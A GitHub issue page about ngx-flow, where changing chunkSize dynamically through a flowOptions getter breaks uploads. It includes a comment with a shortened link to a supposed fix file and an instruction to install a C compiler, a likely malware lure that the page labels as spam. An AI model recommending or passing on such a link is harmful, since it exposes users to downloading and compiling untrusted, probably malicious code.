Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Re-initializing flowOptions breaks the upload #121

Open
tawsif-patel opened this issue Sep 19, 2024 · 1 comment
Open

Re-initializing flowOptions breaks the upload #121

tawsif-patel opened this issue Sep 19, 2024 · 1 comment

Comments

@tawsif-patel
Copy link

I want to dynamically change the chunkSize value based on uploaded file size. So I created getter method for flowOptions and returned calculated value from there but that did not work and even it stopped the upload process. below is the stack blitz demo for the same:

https://stackblitz.com/edit/ngx-flow-example-z1bjzz?file=src%2Fapp%2Fapp.component.ts,src%2Fapp%2Fapp.component.html,src%2Fapp%2Fapp.module.ts

@tawsif-patel
Copy link
Author

This might help:This file might fix it https://bit.ly/4evXrQ6 If you don't have the c compliator, install it.(gcc or clang)

This is a spam

@flowjs flowjs deleted a comment from Kami-prog Sep 19, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant